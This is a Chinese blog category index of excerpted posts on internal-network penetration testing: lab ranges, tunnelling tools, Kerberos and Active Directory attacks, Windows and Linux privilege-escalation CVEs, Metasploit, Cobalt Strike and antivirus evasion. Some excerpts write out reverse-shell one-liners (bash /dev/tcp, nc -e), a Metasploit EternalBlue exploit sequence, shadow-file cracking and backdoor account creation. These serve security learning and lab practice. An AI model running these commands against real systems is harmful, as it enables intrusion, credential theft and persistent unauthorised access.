![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网
文章平均质量分 77
明月清风~~
这个作者很懒,什么都没留下…
展开
-
ATK&CK红队评估实战靶场(一)
ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程回到顶部0x01 前言本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。回到顶部0x02 环境搭建本次环境搭建和靶机默认有些区别,我是在一台服务器的虚拟机上搭建的,服务器.转载 2022-01-31 10:29:19 · 1978 阅读 · 0 评论 -
三层内网渗透笔记-靶场(teamssix.com)
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号。原创 2023-02-02 11:41:34 · 736 阅读 · 0 评论 -
(毒刺)利用Pystinger Socks4上线不出网主机
原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!项目地址:https://github.com/FunnyWolf/pystinger**相关阅读:**1、利用MSF上线断网主机的思路分享2、利用goproxy http上线不出网主机0x01 测试环境0x02 Pystinger简单介绍Pystinger由服转载 2022-07-01 20:24:15 · 1062 阅读 · 0 评论 -
内网渗透 | 手把手教你如何进行内网渗透
发布于2020-02-17 16:42:26阅读 4K0目录结构[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iz2F7mzJ-1656677584270)(https://ask.qcloudimg.com/http-save/yehe-5957324/0v0eirg7bb.png?imageView2/2/w/1620)]首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可转载 2022-07-01 20:14:34 · 2696 阅读 · 1 评论 -
kerberos认证协议
kerberos认证协议kerberos是一种域内认证协议,Kerberos的标志是三头狗,狗头分别代表以下角色:ClientServerKDC(Key Distribution Center) = DC(Domain Controller)Kerberos认证协议的基础概念:票据(Ticket):是网络对象互相访问的凭证。TGT(Ticket Granting Ticket):入场券,通过入场券能够获得票据,是一种临时凭证的存在。KDC负责管理票据、认证票据、分发票据,但是KDC不是转载 2022-04-21 23:00:00 · 2080 阅读 · 2 评论 -
【CVE-2021-42287/CVE-2021-42278 Windows域提权漏洞分析】
转发至:安全客https://www.anquanke.com/post/id/263910CVE-2021-42287/CVE-2021-42278 Windows域提权漏洞分析 阅读量 76400 分享到:转载 2022-04-14 14:45:00 · 3186 阅读 · 0 评论 -
nmap 扫描常见端口——命令
ip记得换proxychains4 nmap -sT -Pn 10.10.1.130 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984 ,6379,7001,7002,9200,9300 ,11211,27017,27018 ,50000,50070,50030,21,22,23,2601,3389 --open原创 2022-03-11 15:16:13 · 16092 阅读 · 0 评论 -
不出网主机的几种上线方式
原文链接:https://www.anquanke.com/post/id/254671#h2-7不出网主机的几种上线方式作者:SD分享到: 发布时间:2021-11-02 10:30:15前言拿到一台边缘机器后,内网的机器很有可能大多数都不出网,这时又想上线cs方便后续操作。本文就如何上线不出网主机的方式进行了总结。环境搭建目标内网机器os:win server 2012ip:192.168.57.137边缘机器os:win server 2012ip1:19转载 2022-03-10 15:30:16 · 1301 阅读 · 0 评论 -
Linux Kernel本地提权漏洞(CVE-2022-0847)漏洞复现
参考: TeamsSix参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w0x00 前言CVSS 评分:7.8影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是原创 2022-03-08 14:23:41 · 2686 阅读 · 0 评论 -
CobaltStrike进阶之 Beacon命令
参考:https://longwaer.blog.csdn.net/article/details/122880607Beacon命令使用命令查看当我们通过生成的后门在目标机上运行后返回一个shell,同样可以使用命令进行信息收集:sleep 0 #将这个回连的间隔设置为0,因为CS中默认回连是60秒一次交互。shell whoami ipconfig hostname #等等这些cmd执行命令,我们都需要在面前加上shell。CS中的基础命令,可以通过help来进行查看,当需要知道单个命令原创 2022-03-02 16:45:45 · 470 阅读 · 0 评论 -
metasploit进阶3
参考:https://longwaer.blog.csdn.net/article/details/122751394域信息收集常用信息收集模块auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10原创 2022-02-28 18:11:29 · 175 阅读 · 0 评论 -
metasploit进阶2
拿到shell 开启远程终端开启远程终端 添加账号getgui 模块——开启远程桌面run getgui -e #开启目标主机远程桌面run post/windows/manage/enable_rdp run getgui -u myqf -p QWEasd123 添加本地管理员转发端口如果服务器防火墙开启的情况下,有可能拦截远程终端端口,使用命令把远程端口3389转发出来Usage: portfwd [-h] [add | delete | list | flush] [args]原创 2022-02-28 17:21:45 · 460 阅读 · 0 评论 -
metasploit进阶
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit原创 2022-02-28 01:01:16 · 855 阅读 · 0 评论 -
metasploit基础命令操作
参考:https://longwaer.blog.csdn.net/article/details/122745903– Exploit,攻击工具/代码– Payload,攻击载荷– Shellcode shell 代码– Module,模块– Listener,监听器初始化数据库msfdb init #对msf数据库进行初始化service postgresql start #监听5432端口 启动PostgreSQL数据库服务 service postgresql status #原创 2022-02-27 21:50:22 · 962 阅读 · 0 评论 -
PowerShell
来源: TeamsSix文章作者: TeamsSix参考文章链接: https://teamssix.com/211027-163641.html#toc-heading-8仅作为学习笔记,侵删范例靶机:红日靶场的dc1、介绍PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高原创 2022-02-26 22:26:28 · 4064 阅读 · 0 评论 -
MS14-068漏洞进行提权
参考:https://blog.csdn.net/qq_37683287/article/details/120450044server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。第一步:利用MS14-068伪造生成TGT第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书kerberos::ptc TGT_test@moonsec.fbi.ccache第三步:获取域管理员权限。创建原创 2022-02-24 22:25:58 · 1706 阅读 · 0 评论 -
CVE-2020-1472 ZeroLogon漏洞分析利用
CVE-2020-1472 ZeroLogon漏洞分析利用暗影安全团队 2021-01-26 14:27:56 1023160x01漏洞简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 Z转载 2022-02-24 21:20:29 · 1382 阅读 · 0 评论 -
Kerberoasting学习
Author: Shu1LLink: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/前言Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种域口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为域攻击的常用方法转载 2022-02-24 13:45:14 · 822 阅读 · 0 评论 -
基于资源的约束委派
参考:https://blog.csdn.net/nicai321/article/details/122679357原理:基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。漏洞复现:资原创 2022-02-23 15:48:34 · 828 阅读 · 0 评论 -
域内委派详解
委派概述:域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户的权限在域内展开活动。简言之:当A访问服务B时,服务B拿着A用户的凭证去访问服务C,这个过程称为委派。委派的方式:非约束委派和约束委派,基于资源的约束委派。**在域内只有主机账号和服务账号才有委派属性****主机账号:**活动目录中的computers组内的计算机,也被称为机器账号。**服务账号:**域内用户的一种类型,是服务器运行服务时所用的账号,将服务运行起来加入域内,比如:SQLServer,MYSQL等;域用户通过注册S转载 2022-02-22 23:56:04 · 2220 阅读 · 0 评论 -
如何探测内网存活主机
本文分享自微信公众号 - Bypass(Bypass–),作者:Bypass,侵删如何探测内网存活主机2020-09-25阅读 1.1K0在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。我们将主机扫描的场景大致可分为三种,1)直接在webshell下执行,通过系统自带命令或上传脚本工具进行扫描探测 ;2)通过反弹shell进行内网渗透,msf等渗透测试框架自带一些扫描模块;3)通过socks代理扫描内网(例如 proxychains+N转载 2022-02-20 13:47:43 · 3104 阅读 · 0 评论 -
john破解shadow root密文登录提权
1.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz原创 2022-02-17 22:56:29 · 1040 阅读 · 0 评论 -
linux反弹shell
使用nc对本地端口监听nc -lvnp 88881.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"2.nc反弹nc -e /bin/sh 192.168.2.130 4444 但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决rm /tmp/f;mkfifo /tmp/原创 2022-02-17 21:58:25 · 1115 阅读 · 0 评论 -
window反弹shell
1.nc反弹shell远程服务器 nc 监听命令nc -vlnp 8080受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。bash -i >& /dev/tcp/10.0.0.1/8080 0>&12.powershell反弹cmdpowercat是netcat的powershell版本所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。http://192.168.0.195/powercat原创 2022-02-16 16:02:39 · 1156 阅读 · 0 评论 -
Kerberos认证
Kerberos认证#在学习黄金白银票据前,首先先了解一下什么是Kerberos认证.KDC(Key Distribution Center)密钥分发中心。在KDC中又分为两个部分:Authentication Service(AS,身份验证服务)和Ticket Granting Service(TGS,票据授权服务)AD会维护一个Account Database(账户数据库). 它存储了域中所有用户的密码Hash和白名单。只有账户密码都在白名单中的Client才能申请到TGT。Kerberos转载 2022-02-11 01:05:24 · 511 阅读 · 0 评论 -
Docker漏洞的记录
原文链接:https://www.cnblogs.com/peterpan0707007/p/15246853.html原文链接:https://blog.csdn.net/weixin_46700042/article/details/109532502侵删【实战】Docker漏洞的记录]Docker容器的特点:1.轻量级在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。2.标准Docker容转载 2022-02-02 15:09:42 · 462 阅读 · 0 评论 -
openssl passwd 手动生成密码——passwd提权
参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html引言:在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。语法格式:openssl原创 2022-02-02 14:21:41 · 5252 阅读 · 2 评论 -
fscan内网工具
fscan简介一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。主要功能1.信息搜集:存活探测(icmp)端口扫描2.爆破功能:各类服务爆破(ssh、smb、rdp等)数据库密码爆破(mysql、mssql、redis、psql、oracle等)3.系统信息、漏洞扫描:netbios探测原创 2022-01-22 14:31:05 · 13915 阅读 · 0 评论 -
免杀老工具backdoor(后门工厂+ Shellter / ico图标+数字签名/替换
backdoor-factorybackdoor模块安装 sudo pip2 install --upgrade pip -i https://pypi.douban.com/simple sudo pip2 install --upgrade setuptools -i https://pypi.douban.com/simple sudo pip2 install pefile -i https://pypi.douban.com/simple sudo pip2 in原创 2022-01-15 11:53:47 · 2790 阅读 · 3 评论 -
内网渗透之代理转发
内网渗透之代理转发内网渗透 酒仙桥六号部队 [](javascript:void(0))2020-09-09 8,815这是 酒仙桥六号部队 的第 36 篇文章。全文共计3447个字,预计阅读时长12分钟。1 前言谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是通过内网转发呢?意义何在呢?因为…大部分时候拿到权限不够,无法直接转载 2021-12-15 16:46:52 · 1849 阅读 · 0 评论 -
内网穿透工具-venom
Venom - A Multi-hop Proxy for Penetration Testers简体中文 | Englishhttps://github.com/Dliv3/VenomVenom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相转载 2021-12-12 13:25:34 · 2002 阅读 · 0 评论 -
内网渗透 | FRP代理工具详解
FRP工具的使用FRP官方文档:https://gofrp.org/docs一、FRP工具的介绍1.为什么需要内网穿透我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到这些设备(远程桌面、远程文件、SSH等等),一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。其实,对于FRP穿透工具来说,它和端口转发有所不同,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,我们通过通过FRP进行内网的全流量的数据代理,像FRP可以代理全端口、全流量的数据,这样我转载 2021-12-07 13:22:51 · 15055 阅读 · 0 评论 -
Metasploit实验
实验二 Metasploit1、实验目的通过本实验可以:1)掌握Metasploit的基本概念 2)掌握Metasploit对各个平台的木马下放3)掌握经典漏洞MS17-0102、实验环境本实验需准备:Kali虚拟机2)Windows虚拟机3)Centos/Ubuntu虚拟机3、实验需求1)将渗透主机KALI,Windows与Metasploitable2的网卡连接模式设置为NAT模式Kali:Windows7:metasploitable2:2)使用metaspoit原创 2021-12-05 17:24:56 · 2423 阅读 · 0 评论 -
fscan:一键自动化、全方位漏洞扫描的开源工具
开源前哨简介fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。源码链接:https://github.com/shadow1ng/fscan主要功能1.信息搜集:存活探测(icmp)端口扫描2.爆破功能:各类服务爆破(ssh、smb等)数据库密码爆破(mysql、mssq转载 2021-11-27 12:16:20 · 2582 阅读 · 0 评论 -
AdFind-域内信息查询工具
一、简介AdFind 一款C++编写的域内查询信息的工具 下载地址:https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml二、常用命令列出域控制器名称:AdFind -sc dclist查看域控版本AdFind -schema -s base objectversion查询当前域中在线的计算机:AdFind -sc computers_active查询当前域中在线的计算机(只显示名称和操作转载 2021-11-27 12:09:45 · 1290 阅读 · 0 评论 -
内网信息收集基础+nc+socat
cmd手动搜集命令 ipconfig /all #查看网卡信息 systeminfo | findstr "OS" #查看系统版本信息 wmic product get name,version #查看安装软件的版本和路径 systeminfo | findstr "KB" = wmic qfe list #查看系统补丁 wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntivirusProduct Get d原创 2021-11-21 20:39:25 · 2048 阅读 · 0 评论